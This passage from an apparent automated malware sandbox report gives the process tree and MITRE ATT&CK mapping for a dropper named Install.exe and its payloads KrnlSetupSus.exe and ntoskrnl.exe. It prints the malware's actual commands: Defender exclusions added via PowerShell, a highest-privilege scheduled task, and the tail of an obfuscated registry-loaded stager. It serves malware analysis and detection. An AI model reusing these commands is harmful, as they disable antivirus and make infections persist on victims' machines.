+'FTWA'+[Char](82)+'E').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2304

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1392
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2612

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2668

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3492
- C:\Users\Admin\AppData\Local\Temp\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\ProgramData\Install.exe
    "C:\ProgramData\Install.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:972
- - C:\ProgramData\KrnlSetupSus.exe
    "C:\ProgramData\KrnlSetupSus.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3244
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetupSus.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3320
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:916
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4292
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3168
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:976
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3736
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 976 -s 304
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3992
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
      4⤵
      PID:976
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF57C.tmp.bat""
      4⤵
      PID:1564
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2280
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:3600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3616

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3816

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:684

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2776

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1424

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:1432

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5044

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:2812

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1532

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe da20875ce8e004b03df363f3efd45494 XLMApp32GEe1q/uqtbUcMA.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:2888
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:1244

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4672

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3120

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3532

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery